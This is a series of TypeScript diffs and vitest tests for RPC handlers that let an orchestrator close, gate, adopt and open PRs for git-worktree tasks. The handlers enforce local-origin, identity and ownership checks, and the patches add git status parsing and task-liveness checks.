+describe('registration', () => {
+  it('registers exactly the five contracted methods', () => {
+    const handlers = new Map<string, Handler>();
+    const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
+    registerWorktaskRpc(router, {
+      daemon: { rpc: vi.fn() },
+      getWindow: () => null,
+      close: {} as TaskCloseService,
+      pr: {} as TaskPrService,
+      adopt: {} as TaskAdoptService,
+      gate: {} as TaskGateRunner,
+    });
+    expect([...handlers.keys()].sort()).toEqual([...WORKTASK_RPC_METHODS].sort());
+  });
+});
+
+describe.each(WORKTASK_RPC_METHODS)('%s — shared gates', (method) => {
+  it('refuses a non-local origin', async () => {
+    const h = harness();
+    const res = await h.call(method, { taskId: TASK.id }, { origin: 'remote' } as RpcContext);
+    expect(res).toMatchObject({ ok: false, error: { code: 'NOT_AUTHORIZED' } });
+  });
+
+  it('refuses a caller-stated verifiedWorkspaceId instead of ignoring it', async () => {
+    const h = harness();
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1', verifiedWorkspaceId: 'ws-other' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'INVALID_ARGUMENT' } });
+    expect(String((res.error as { message: string }).message)).toContain('verifiedWorkspaceId');
+  });
+
+  it('refuses a caller whose identity cannot be resolved', async () => {
+    const h = harness({ ownerWorkspaceId: null });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'NOT_AUTHORIZED' } });
+  });
+
+  it('requires a taskId', async () => {
+    const h = harness();
+    const res = await h.call(method, { senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'INVALID_ARGUMENT' } });
+  });
+
+  it('reports an unknown task and a foreign task identically (owner-scoped list)', async () => {
+    const unknown = await harness({ tasks: [] }).call(method, { taskId: 'wtask-nope', senderPtyId: 'pty-1' });
+    const foreign = await harness({ tasks: [] }).call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(unknown).toMatchObject({ ok: false, error: { code: 'NOT_FOUND' } });
+    expect(foreign).toMatchObject({ ok: false, error: { code: 'NOT_FOUND' } });
+  });
+
+  it('scopes the ownership lookup to the resolved workspace', async () => {
+    const h = harness();
+    await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.missionListParams()).toEqual({ verifiedWorkspaceId: CALLER_WS });
+  });
+
+  it('takes the commander binding over a stated senderPtyId', async () => {
+    const h = harness();
+    await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-someone-else' }, {
+      origin: 'local',
+      commanderWorkspace: CALLER_WS,
+    } as RpcContext);
+    expect(h.missionListParams()).toEqual({ verifiedWorkspaceId: CALLER_WS });
+    expect(vi.mocked(resolvePtyOwnerWorkspace)).not.toHaveBeenCalled();
+  });
+});
+
+describe('task.gate.run', () => {
+  it('runs the gate in the task worktree as a system actor', async () => {
+    const h = harness();
+    const res = await h.call('task.gate.run', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.gateRun).toHaveBeenCalledWith({
+      taskId: TASK.id,
+      worktreePath: TASK.worktreePath,
+      systemWorkspaceId: 'ws-daemon',
+    });
+    expect(res).toMatchObject({ ok: true, status: 'completed', title: TASK.title });
+  });
+
+  it('refuses a task with no worktree on disk instead of failing inside git', async () => {
+    const h = harness({ onDisk: false });
+    const res = await h.call('task.gate.run', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'FAILED_PRECONDITION' } });
+    expect(h.gateRun).not.toHaveBeenCalled();
+  });
+
+  it('passes a busy verdict through as an answer, not an error envelope', async () => {
+    const h = harness();
+    h.gateRun.mockResolvedValueOnce({ ok: false, status: 'busy', taskId: TASK.id });
+    const res = await h.call('task.gate.run', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, status: 'busy' });
+  });
+});
+
+describe('task.gate.cancel', () => {
+  it('reports whether anything was actually cancelled', async () => {
+    const h = harness();
+    expect(await h.call('task.gate.cancel', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: true,
+      cancelled: true,
+    });
+    h.gateCancel.mockReturnValueOnce(false);
+    expect(await h.call('task.gate.cancel', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: true,
+      cancelled: false,
+    });
+  });
+});
+
+describe('task.adopt', () => {
+  it('adopts the whole task worktree', async () => {
+    const h = harness();
+    const res = await h.call('task.adopt', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.adopt).toHaveBeenCalledWith({ taskId: TASK.id, worktreePath: TASK.worktreePath });
+    expect(res).toMatchObject({ ok: true, files: ['a.ts'] });
+  });
+
+  it('passes a dirty-target refusal straight through', async () => {
+    const h = harness();
+    h.adopt.mockResolvedValueOnce({ ok: false, taskId: TASK.id, reason: 'dirty-target', error: 'x' });
+    expect(await h.call('task.adopt', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: false,
+      reason: 'dirty-target',
+    });
+  });
+});
+
+describe('task.close', () => {
+  it('closes with the server-derived identity', async () => {
+    const h = harness();
+    await h.call('task.close', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.closeTask).toHaveBeenCalledWith(
+      expect.objectContaining({ taskId: TASK.id, verifiedWorkspaceId: CALLER_WS, worktreePath: TASK.worktreePath }),
+    );
+  });
+
+  it('close-only when the worktree is gone from disk', async () => {
+    const h = harness({ onDisk: false });
+    await h.call('task.close', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.closeTask).toHaveBeenCalledWith({ taskId: TASK.id, verifiedWorkspaceId: CALLER_WS });
+  });
+
+  it('reports the dirty-worktree refusal from the close service', async () => {
+    const h = harness();
+    h.closeTask.mockResolvedValueOnce({ ok: false, taskId: TASK.id, reason: 'dirty', error: 'preserved' });
+    expect(await h.call('task.close', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: false,
+      reason: 'dirty',
+    });
+  });
+
+  it('reports the unpushed-branch refusal from the close service', async () => {
+    const h = harness();
+    h.closeTask.mockResolvedValueOnce({ ok: false, taskId: TASK.id, reason: 'unpushed', error: '2 commits', aheadCount: 2 });
+    expect(await h.call('task.close', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: false,
+      reason: 'unpushed',
+      aheadCount: 2,
+    });
+  });
+});
+
+describe('task.pr', () => {
+  it('opens the PR from the task branch the daemon reported', async () => {
+    const h = harness();
+    const res = await h.call('task.pr', { taskId: TASK.id, senderPtyId: 'pty-1', body: 'why' });
+    expect(h.createPr).toHaveBeenCalledWith({
+      taskId: TASK.id,
+      verifiedWorkspaceId: CALLER_WS,
+      worktreePath: TASK.worktreePath,
+      branch: TASK.branch,
+      title: TASK.title,
+      body: 'why',
+    });
+    expect(res).toMatchObject({ ok: true, prUrl: 'https://example.test/pr/1' });
+  });
+
+  it('refuses an unmaterialized task rather than pushing nothing', async () => {
+    const h = harness({ tasks: [{ ...TASK, branch: undefined, worktreePath: undefined }] });
+    const res = await h.call('task.pr', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'FAILED_PRECONDITION' } });
+    expect(h.createPr).not.toHaveBeenCalled();
+  });
+});

--- a/src/main/pipe/handlers/worktask.rpc.ts
+++ b/src/main/pipe/handlers/worktask.rpc.ts
@@ -127,12 +127,30 @@ function deny(code: string, message: string): { ok: false; error: { code: string
   return { ok: false, error: { code, message } };
 }
 
-async function listMissions(daemon: WorktaskRpcDaemonPort, verifiedWorkspaceId: string): Promise<ProjectionTask[]> {
-  const res = (await daemon.rpc('task.mission.list', { verifiedWorkspaceId })) as
-    | { ok?: boolean; tasks?: ProjectionTask[] }
-    | undefined;
-  if (!res || res.ok !== true || !Array.isArray(res.tasks)) return [];
-  return res.tasks;
+/**
+ * The caller's own tasks, or WHY we could not ask. Collapsing a daemon outage
+ * into `[]` made every method answer NOT_FOUND — "no such task" — for a task
+ * that plainly exists, which is the one answer that tells a caller to stop
+ * retrying and go looking for a bug in its own bookkeeping.
+ */
+async function listMissions(
+  daemon: WorktaskRpcDaemonPort,
+  verifiedWorkspaceId: string,
+): Promise<{ tasks: ProjectionTask[] } | { code: string; message: string }> {
+  let res: { ok?: boolean; tasks?: ProjectionTask[]; error?: { message?: unknown } } | undefined;
+  try {
+    res = (await daemon.rpc('task.mission.list', { verifiedWorkspaceId })) as typeof res;
+  } catch (err) {
+    return {
+      code: 'UNAVAILABLE',
+      message: `could not reach the daemon to list your tasks: ${err instanceof Error ? err.message : String(err)}`,
+    };
+  }
+  if (!res || res.ok !== true || !Array.isArray(res.tasks)) {
+    const detail = typeof res?.error?.message === 'string' ? `: ${res.error.message}` : '';
+    return { code: 'UNAVAILABLE', message: `the daemon could not list your tasks${detail}` };
+  }
+  return { tasks: res.tasks };
 }
 
 /**
@@ -174,11 +192,22 @@ async function resolveCaller(
   return { workspaceId };
 }
 
-/** The caller + the task it named, or the wire error to answer with. */
+/**
+ * The caller + the task it named, or the wire error to answer with.
+ *
+ * `requireLive` is for the methods that ACT on a task (gate, adopt, PR). A
+ * closed task's worktree has been removed and a detached one has been handed
+ * away deliberately — running a gate in either is at best a confusing git error
+ * and at worst work done in a directory nobody is watching. The read-only
+ * methods and `task.close` itself do not set it: reading a finished task is
+ * useful, and closing an already-closed one is how the cleanup scan
+ * reconciles.
+ */
 async function resolveOwnedTask(
   deps: WorktaskRpcDeps,
   params: Record<string, unknown>,
   ctx: RpcContext | undefined,
+  requireLive = false,
 ): Promise<{ workspaceId: string; task: ProjectionTask } | { code: string; message: string }> {
   const taskId = typeof params['taskId'] === 'string' ? params['taskId'].trim() : '';
   if (!taskId) return { code: 'INVALID_ARGUMENT', message: 'taskId is required' };
@@ -186,14 +215,27 @@ async function resolveOwnedTask(
   const caller = await resolveCaller(deps.getWindow, params, ctx);
   if (!('workspaceId' in caller)) return caller;
 
-  const tasks = await listMissions(deps.daemon, caller.workspaceId);
-  const task = tasks.find((t) => t.id === taskId);
+  const listed = await listMissions(deps.daemon, caller.workspaceId);
+  if (!('tasks' in listed)) return listed;
+  const task = listed.tasks.find((t) => t.id === taskId);
   if (!task) {
     // Owner-scoped list: unknown id and another workspace's id are the same
     // answer, and saying which would confirm a task exists elsewhere.
     return {
       code: 'NOT_FOUND',
-      message: `no task '${taskId}' is owned by your workspace — list your missions to see the ones you may act on`,
+      message: `no task '${taskId}' is owned by your workspace — list your tasks to see the ones you may act on`,
+    };
+  }
+  if (requireLive && task.detachedAt !== undefined) {
+    return {
+      code: 'FAILED_PRECONDITION',
+      message: `task '${taskId}' was detached — its worktree is no longer this orchestrator's to act on`,
+    };
+  }
+  if (requireLive && task.status !== 'open') {
+    return {
+      code: 'FAILED_PRECONDITION',
+      message: `task '${taskId}' is closed; reopen the work as a new task rather than acting on a closed one`,
     };
   }
   return { workspaceId: caller.workspaceId, task };
@@ -249,9 +291,15 @@ async function runGitLike(cmd: 'git' | 'gh', args: string[], cwd: string): Promi
   }
 }
 
-/** `git status --porcelain=v1 --branch` → structured. The first line is the
- *  branch header; every other line is `XY <path>`. Renames carry ` -> `, and
- *  the destination is the path that matters to a reader. */
+/**
+ * `git status --porcelain=v1 --branch -z` → structured.
+ *
+ * NUL-framed, not line-split. Without `-z` git QUOTES any path that is not
+ * plain ASCII (`"src/\303\251.ts"`) and a path containing a newline arrives as
+ * two lines — so a caller acting on `files[].path` was handed names that do not
+ * exist on disk. The branch header is the first record; a rename carries its
+ * source in the FOLLOWING record, which is consumed with it.
+ */
 export function parseGitStatus(stdout: string): {
   branch: string;
   ahead: number;
@@ -259,14 +307,15 @@ export function parseGitStatus(stdout: string): {
   clean: boolean;
   files: { status: string; path: string }[];
 } {
-  const lines = stdout.split('\n').filter((l) => l.length > 0);
+  const records = stdout.split('\0').filter((r) => r.length > 0);
   let branch = '';
   let ahead = 0;
   let behind = 0;
   const files: { status: string; path: string }[] = [];
-  for (const line of lines) {
-    if (line.startsWith('## ')) {
-      const header = line.slice(3);
+  for (let i = 0; i < records.length; i++) {
+    const rec = records[i] as string;
+    if (rec.startsWith('## ')) {
+      const header = rec.slice(3);
       const nameEnd = header.indexOf(' [');
       const name = nameEnd === -1 ? header : header.slice(0, nameEnd);
       branch = name.split('...')[0]?.trim() ?? '';
@@ -276,10 +325,12 @@ export function parseGitStatus(stdout: string): {
       behind = behindMatch ? Number(behindMatch[1]) : 0;
       continue;
     }
-    const status = line.slice(0, 2);
-    const rest = line.slice(3);
-    const arrow = rest.indexOf(' -> ');
-    files.push({ status, path: arrow === -1 ? rest : rest.slice(arrow + 4) });
+    if (rec.length < 4) continue;
+    const status = rec.slice(0, 2);
+    files.push({ status, path: rec.slice(3) });
+    // R/C put the ORIGIN path in the next record — it is part of this entry,
+    // not a file of its own.
+    if (status[0] === 'R' || status[0] === 'C') i += 1;
   }
   return { branch, ahead, behind, clean: files.length === 0, files };
 }
@@ -324,16 +375,22 @@ export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): v
   register('task.gate.run', async (params, ctx?: RpcContext) => {
     const blocked = localOnly(ctx, 'task.gate.run');
     if (blocked) return blocked;
-    const owned = await resolveOwnedTask(deps, params, ctx);
+    const owned = await resolveOwnedTask(deps, params, ctx, true);
     if (!('task' in owned)) return deny(owned.code, owned.message);
     const { task } = owned;
     if (!task.worktreePath || !fileExists(task.worktreePath)) {
       return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk, so there is nothing to run a gate in`);
     }
+    // The wmux.json trust verdict is keyed by the path the USER approved — the
+    // parent repository — not by a wtask/ worktree the daemon minted minutes
+    // ago. Resolved here and handed to the runner, which reads the config there
+    // and still RUNS the gate in the worktree.
+    const repo = await resolveRepoInfo(task.worktreePath);
     const result = await deps.gate.run({
       taskId: task.id,
       worktreePath: task.worktreePath,
       systemWorkspaceId,
+      ...(repo ? { projectRoot: repo.repoRoot } : {}),
     });
     // `busy` and `refused` are answers, not transport failures — the envelope
     // carries them so a poller can tell them apart without parsing text.
@@ -355,7 +412,7 @@ export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): v
   register('task.adopt', async (params, ctx?: RpcContext) => {
     const blocked = localOnly(ctx, 'task.adopt');
     if (blocked) return blocked;
-    const owned = await resolveOwnedTask(deps, params, ctx);
+    const owned = await resolveOwnedTask(deps, params, ctx, true);
     if (!('task' in owned)) return deny(owned.code, owned.message);
     const { task } = owned;
     if (!task.worktreePath || !fileExists(task.worktreePath)) {
@@ -397,7 +454,7 @@ export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): v
   register('task.pr', async (params, ctx?: RpcContext) => {
     const blocked = localOnly(ctx, 'task.pr');
     if (blocked) return blocked;
-    const owned = await resolveOwnedTask(deps, params, ctx);
+    const owned = await resolveOwnedTask(deps, params, ctx, true);
     if (!('task' in owned)) return deny(owned.code, owned.message);
     const { task, workspaceId } = owned;
     if (!task.worktreePath || !task.branch) {
@@ -430,7 +487,7 @@ export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): v
     if (!task.worktreePath || !fileExists(task.worktreePath)) {
       return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk`);
     }
-    const res = await exec('git', ['status', '--porcelain=v1', '--branch'], task.worktreePath);
+    const res = await exec('git', ['status', '--porcelain=v1', '--branch', '-z'], task.worktreePath);
     if (res.code !== 0) {
       return { ok: false as const, taskId: task.id, reason: 'git-failed' as const, error: res.stderr.trim() };
     }

--- a/src/main/pipe/handlers/worktask.rpc.ts
+++ b/src/main/pipe/handlers/worktask.rpc.ts
@@ -1,0 +1,321 @@
+// ─── task.gate.* / task.adopt / task.close / task.pr on the pipe ─────────────
+//
+// Closing a task, opening its PR, adopting its result and running its gate were
+// all reachable from exactly one place: the Electron renderer, over ipcMain. An
+// orchestrator brain is not a renderer, so it could start N tasks and then do
+// nothing with any of them — it could only ask a human to click. These five
+// methods are that missing half, and they are deliberately the SAME services the
+// GUI drives (TaskCloseService, TaskPrService, TaskGateRunner, TaskAdoptService)
+// rather than a second implementation with its own rules.
+//
+// The gates, in the order they run, and all of them verbatim from the fan-out
+// handler next door (fanout.rpc.ts) because these calls are strictly more
+// destructive than spawning a worktree:
+//
+//   R4 origin allowlist — `ctx.origin === 'local'` or reject. A remote caller
+//      never closes a task or writes to a repository.
+//   R2 identity — the caller's workspace is SERVER-RESOLVED: a commander token
+//      (ctx.commanderWorkspace) outranks a stated senderPtyId, and a pane agent
+//      is resolved from its verified pty. A caller-supplied
+//      `verifiedWorkspaceId` is REJECTED, not ignored — being silently
+//      overruled leaves a caller believing it acted as someone it is not.
+//   Ownership — the task must appear in `task.mission.list` scoped to that
+//      resolved workspace. That list is owner-scoped by the daemon, so "not in
+//      it" covers both "no such task" and "someone else's task"; the two are
+//      reported apart only where doing so leaks nothing (an unknown id is not
+//      evidence of another workspace's task, because the answer is the same).
+//   Materialization — close/pr/adopt/gate all need a worktree on disk. A task
+//      that never materialized is refused with that reason rather than a
+//      confusing git error.
+//
+// Approval: none is raised here. These methods are reached from MCP tools, and
+// an MCP tool call passes through the existing PreToolUse permission gate
+// (GateBroker) before it ever becomes an RPC — so adding a second prompt would
+// ask the user twice for one action. `task.close` is teardown-class and must be
+// listed in TEARDOWN_DENY_METHODS on the commander surface; see
+// docs/internal/orch-o2-tool-contract.md.
+
+import * as crypto from 'node:crypto';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import type { BrowserWindow } from 'electron';
+
+import type { RpcRouter } from '../RpcRouter';
+import type { RpcContext, RpcMethod } from '../../../shared/rpc';
+import { HUMAN_WORKSPACE_ID } from '../../../shared/channels';
+import { resolvePtyOwnerWorkspace } from '../../workspace/ptyOwnership';
+import { git as runGit } from '../../git/git';
+import { metaDirForWorktree } from '../../worktask/TaskWorktreeManager';
+import type { TaskCloseService } from '../../worktask/TaskCloseService';
+import type { TaskPrService } from '../../worktask/TaskPrService';
+import type { TaskAdoptService } from '../../worktask/TaskAdoptService';
+import type { TaskGateRunner } from '../../worktask/TaskGateRunner';
+
+type GetWindow = () => BrowserWindow | null;
+
+/** The five methods this file registers. Named once so the contract doc, the
+ *  MCP tools and lane F's allow-list all quote the same strings. */
+export const WORKTASK_RPC_METHODS = [
+  'task.gate.run',
+  'task.gate.cancel',
+  'task.adopt',
+  'task.close',
+  'task.pr',
+] as const;
+
+export type WorktaskRpcMethod = (typeof WORKTASK_RPC_METHODS)[number];
+
+/** Minimal daemon RPC surface (same shape as CloseDaemonPort). */
+export interface WorktaskRpcDaemonPort {
+  rpc(method: string, params: Record<string, unknown>): Promise<unknown>;
+}
+
+export interface WorktaskRpcDeps {
+  daemon: WorktaskRpcDaemonPort;
+  getWindow: GetWindow;
+  /** MUST be the same instances the renderer IPC handler drives. */
+  close: TaskCloseService;
+  pr: TaskPrService;
+  adopt: TaskAdoptService;
+  gate: TaskGateRunner;
+  /** The daemon's own workspace id, used as the `system` actor on ledger
+   *  writes. Defaults to 'ws-daemon'. */
+  systemWorkspaceId?: string;
+  /** Injected for tests; defaults to fs.existsSync. */
+  fileExists?: (p: string) => boolean;
+}
+
+/** Projection task, minimal shape (task.mission.list). */
+interface ProjectionTask {
+  id: string;
+  title: string;
+  status: 'open' | 'closed';
+  branch?: string;
+  worktreePath?: string;
+  detachedAt?: number;
+}
+
+/** Typed wire error, shaped like the fan-out / mission envelopes so MCP tools
+ *  can branch on `error.code` instead of parsing prose. */
+function deny(code: string, message: string): { ok: false; error: { code: string; message: string } } {
+  return { ok: false, error: { code, message } };
+}
+
+async function listMissions(daemon: WorktaskRpcDaemonPort, verifiedWorkspaceId: string): Promise<ProjectionTask[]> {
+  const res = (await daemon.rpc('task.mission.list', { verifiedWorkspaceId })) as
+    | { ok?: boolean; tasks?: ProjectionTask[] }
+    | undefined;
+  if (!res || res.ok !== true || !Array.isArray(res.tasks)) return [];
+  return res.tasks;
+}
+
+/**
+ * R2 — the caller's workspace, server-resolved. A validated commander binding
+ * outranks a stated senderPtyId (the token is the stronger claim, and honouring
+ * the pty field for a brain would let it aim at a workspace it is not bound to).
+ */
+async function resolveCaller(
+  getWindow: GetWindow,
+  params: Record<string, unknown>,
+  ctx: RpcContext | undefined,
+): Promise<{ workspaceId: string } | { code: string; message: string }> {
+  if (params['verifiedWorkspaceId'] !== undefined) {
+    return {
+      code: 'INVALID_ARGUMENT',
+      message: 'this method does not accept verifiedWorkspaceId — your workspace is resolved from your verified caller',
+    };
+  }
+  const commanderWorkspaceId = ctx?.commanderWorkspace ?? '';
+  const senderPtyId = commanderWorkspaceId
+    ? ''
+    : typeof params['senderPtyId'] === 'string'
+      ? params['senderPtyId'].trim()
+      : '';
+  let workspaceId = commanderWorkspaceId;
+  if (!workspaceId && senderPtyId) {
+    try {
+      workspaceId = (await resolvePtyOwnerWorkspace(getWindow, senderPtyId)) ?? '';
+    } catch {
+      workspaceId = '';
+    }
+  }
+  if (!workspaceId) {
+    return { code: 'NOT_AUTHORIZED', message: 'a verifiable caller is required (no resolvable senderPtyId)' };
+  }
+  if (workspaceId === HUMAN_WORKSPACE_ID) {
+    return { code: 'NOT_AUTHORIZED', message: `'${HUMAN_WORKSPACE_ID}' is the reserved human workspace` };
+  }
+  return { workspaceId };
+}
+
+/** The caller + the task it named, or the wire error to answer with. */
+async function resolveOwnedTask(
+  deps: WorktaskRpcDeps,
+  params: Record<string, unknown>,
+  ctx: RpcContext | undefined,
+): Promise<{ workspaceId: string; task: ProjectionTask } | { code: string; message: string }> {
+  const taskId = typeof params['taskId'] === 'string' ? params['taskId'].trim() : '';
+  if (!taskId) return { code: 'INVALID_ARGUMENT', message: 'taskId is required' };
+
+  const caller = await resolveCaller(deps.getWindow, params, ctx);
+  if (!('workspaceId' in caller)) return caller;
+
+  const tasks = await listMissions(deps.daemon, caller.workspaceId);
+  const task = tasks.find((t) => t.id === taskId);
+  if (!task) {
+    // Owner-scoped list: unknown id and another workspace's id are the same
+    // answer, and saying which would confirm a task exists elsewhere.
+    return {
+      code: 'NOT_FOUND',
+      message: `no task '${taskId}' is owned by your workspace — list your missions to see the ones you may act on`,
+    };
+  }
+  return { workspaceId: caller.workspaceId, task };
+}
+
+/** Repo root + repoHash for a task worktree. Same derivation (and same hash
+ *  rule: sha256 of the realpath, 12 chars) the IPC close path uses, so the
+ *  worktree mutex key matches whichever surface closed the task. */
+async function resolveRepoInfo(worktreePath: string): Promise<{ repoRoot: string; repoHash: string } | null> {
+  let commonDir = '';
+  const modern = await runGit(['rev-parse', '--path-format=absolute', '--git-common-dir'], worktreePath);
+  if (modern.code === 0) {
+    commonDir = modern.stdout.trim();
+  } else {
+    const legacy = await runGit(['rev-parse', '--git-common-dir'], worktreePath);
+    if (legacy.code !== 0) return null;
+    const raw = legacy.stdout.trim();
+    commonDir = raw ? path.resolve(worktreePath, raw) : '';
+  }
+  if (!commonDir) return null;
+  const top = await runGit(['rev-parse', '--show-toplevel'], path.dirname(commonDir));
+  if (top.code !== 0) return null;
+  const repoRoot = top.stdout.trim();
+  if (!repoRoot) return null;
+  let real = repoRoot;
+  try {
+    real = fs.realpathSync(repoRoot);
+  } catch {
+    // Unresolvable symlink — hash the path we have; the IPC path does the same.
+  }
+  return { repoRoot, repoHash: crypto.createHash('sha256').update(real).digest('hex').slice(0, 12) };
+}
+
+/**
+ * Register the task-lifecycle pipe methods. `close`, `pr` and `gate` MUST be
+ * the same service instances the renderer IPC handler uses — TaskWorktreeManager
+ * keeps a per-repo mutex chain, and two instances would race for git's
+ * index.lock.
+ *
+ * The methods are not yet in the `RpcMethod` union (lane F owns
+ * src/shared/rpc.ts); the cast below is the seam, and it disappears the moment
+ * the five strings are added there.
+ */
+export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): void {
+  const systemWorkspaceId = deps.systemWorkspaceId ?? 'ws-daemon';
+  const fileExists = deps.fileExists ?? ((p: string) => fs.existsSync(p));
+  const register = (method: WorktaskRpcMethod, handler: Parameters<RpcRouter['register']>[1]): void =>
+    router.register(method as unknown as RpcMethod, handler);
+
+  const localOnly = (ctx: RpcContext | undefined, method: string): { ok: false; error: { code: string; message: string } } | null =>
+    ctx?.origin === 'local'
+      ? null
+      : deny('NOT_AUTHORIZED', `${method} is local-origin only (remote callers cannot act on tasks)`);
+
+  // ── task.gate.run ────────────────────────────────────────────────────
+  register('task.gate.run', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.gate.run');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task } = owned;
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk, so there is nothing to run a gate in`);
+    }
+    const result = await deps.gate.run({
+      taskId: task.id,
+      worktreePath: task.worktreePath,
+      systemWorkspaceId,
+    });
+    // `busy` and `refused` are answers, not transport failures — the envelope
+    // carries them so a poller can tell them apart without parsing text.
+    return result.ok ? { ...result, title: task.title } : result;
+  });
+
+  // ── task.gate.cancel ─────────────────────────────────────────────────
+  register('task.gate.cancel', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.gate.cancel');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    // Cancelling a gate that is not running is not an error: a caller racing a
+    // gate that just finished should read `cancelled: false`, not a failure.
+    return { ok: true as const, taskId: owned.task.id, cancelled: deps.gate.cancel(owned.task.id) };
+  });
+
+  // ── task.adopt ───────────────────────────────────────────────────────
+  register('task.adopt', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.adopt');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task } = owned;
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk, so it has produced nothing to adopt`);
+    }
+    return deps.adopt.adopt({ taskId: task.id, worktreePath: task.worktreePath });
+  });
+
+  // ── task.close ───────────────────────────────────────────────────────
+  // Teardown-class: it removes a git worktree. TaskCloseService owns the order
+  // contract (unpushed check → remove → mission.close → meta cleanup) and both
+  // the dirty and unpushed refusals; this handler adds identity and the repo
+  // derivation and changes none of it.
+  register('task.close', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.close');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task, workspaceId } = owned;
+
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      // Nothing on disk to remove — close-only, exactly as the IPC path
+      // reconciles an unmaterialized or already-deleted task.
+      return deps.close.closeTask({ taskId: task.id, verifiedWorkspaceId: workspaceId });
+    }
+    const repo = await resolveRepoInfo(task.worktreePath);
+    if (!repo) return deps.close.closeTask({ taskId: task.id, verifiedWorkspaceId: workspaceId });
+    return deps.close.closeTask({
+      taskId: task.id,
+      verifiedWorkspaceId: workspaceId,
+      repoRoot: repo.repoRoot,
+      repoHash: repo.repoHash,
+      worktreePath: task.worktreePath,
+      metaDir: metaDirForWorktree(task.worktreePath),
+    });
+  });
+
+  // ── task.pr ──────────────────────────────────────────────────────────
+  register('task.pr', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.pr');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task, workspaceId } = owned;
+    if (!task.worktreePath || !task.branch) {
+      return deny(
+        'FAILED_PRECONDITION',
+        `task '${task.id}' has no worktree and branch yet, so there is no branch to open a PR from`,
+      );
+    }
+    const body = typeof params['body'] === 'string' ? params['body'] : undefined;
+    return deps.pr.createPr({
+      taskId: task.id,
+      verifiedWorkspaceId: workspaceId,
+      worktreePath: task.worktreePath,
+      branch: task.branch,
+      title: task.title,
+      ...(body !== undefined ? { body } : {}),
+    });
+  });
+}

--- a/src/main/pipe/handlers/worktask.rpc.ts
+++ b/src/main/pipe/handlers/worktask.rpc.ts
@@ -38,18 +38,23 @@
 import * as crypto from 'node:crypto';
 import * as fs from 'node:fs';
 import * as path from 'node:path';
+import { execFile } from 'node:child_process';
+import { promisify } from 'node:util';
 import type { BrowserWindow } from 'electron';
 
 import type { RpcRouter } from '../RpcRouter';
 import type { RpcContext, RpcMethod } from '../../../shared/rpc';
 import { HUMAN_WORKSPACE_ID } from '../../../shared/channels';
 import { resolvePtyOwnerWorkspace } from '../../workspace/ptyOwnership';
-import { git as runGit } from '../../git/git';
+import { git as runGit, type GitResult } from '../../git/git';
+import { getExecEnv } from '../../../shared/execEnv';
 import { metaDirForWorktree } from '../../worktask/TaskWorktreeManager';
 import type { TaskCloseService } from '../../worktask/TaskCloseService';
 import type { TaskPrService } from '../../worktask/TaskPrService';
 import type { TaskAdoptService } from '../../worktask/TaskAdoptService';
 import type { TaskGateRunner } from '../../worktask/TaskGateRunner';
+
+const execFileAsync = promisify(execFile);
 
 type GetWindow = () => BrowserWindow | null;
 
@@ -61,6 +66,13 @@ export const WORKTASK_RPC_METHODS = [
   'task.adopt',
   'task.close',
   'task.pr',
+  // Read-only. These are RPCs rather than git run from inside the MCP broker
+  // for one reason: the ownership check. A tool that shelled out locally would
+  // first need the worktree path, and handing a caller a path to run git in is
+  // the whole authorization problem over again.
+  'task.git.status',
+  'task.git.log',
+  'task.gh.prView',
 ] as const;
 
